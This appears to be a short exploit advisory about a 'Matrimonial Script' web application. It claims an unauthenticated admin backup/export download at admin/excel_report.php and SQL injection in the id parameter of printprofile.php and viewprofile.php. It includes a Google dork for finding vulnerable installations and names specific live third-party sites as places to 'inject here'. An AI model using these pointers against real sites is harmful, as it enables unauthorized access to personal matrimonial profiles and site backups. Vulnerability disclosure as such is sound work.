======================================================================== | # Title : Matrimonial Script unauthorized Export & Download Backup vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version : n/a | # Vendor : http://www.scubez.net/ | # Link : http://www.mscript.in/ * Demo: http://www.mscript.in/matrimonial-demo.html | # Dork : "printprofile.php?id=" ======================================================================== poc : https://www.youtube.com/watch?v=ZMw-JpgqrvU&feature=youtu.be Download Backup : add payload after choose a target " admin/excel_report.php " http://searchmyaddress.biz/matri/admin/excel_report.php Sql injection : http://www.akankshamatrimonial.com/printprofile.php?id=MAT13534 => inject here http://www.lagnamkaroti.com/viewprofile.php?id=MB00011 => inject here Greetz : ⵏⴻⴽⴽⴰⴰ ⵙⴰⵍⴰⵀ ⴻⴷⴷⵉⵏⴻ------ⵯⵉⵯⴰ ⴰⵎⴰⵣⵉⴳⴻⵏ-------- ⵎⴰⵅⵡⴻⵍⵍ ⵛⴰⵛⵀⴷoⵍⵍⴰⵔ ------ | jericho * Larry W. Cashdollar * moncet-1 * Shadow00715 * Ihsan Sencan | | ===================== pⴰⵛⴽⴻⵜ ⵙⵜoⵔⵎ ⵙⴻⵛⵓⵔⵉⵜⵢ ===============================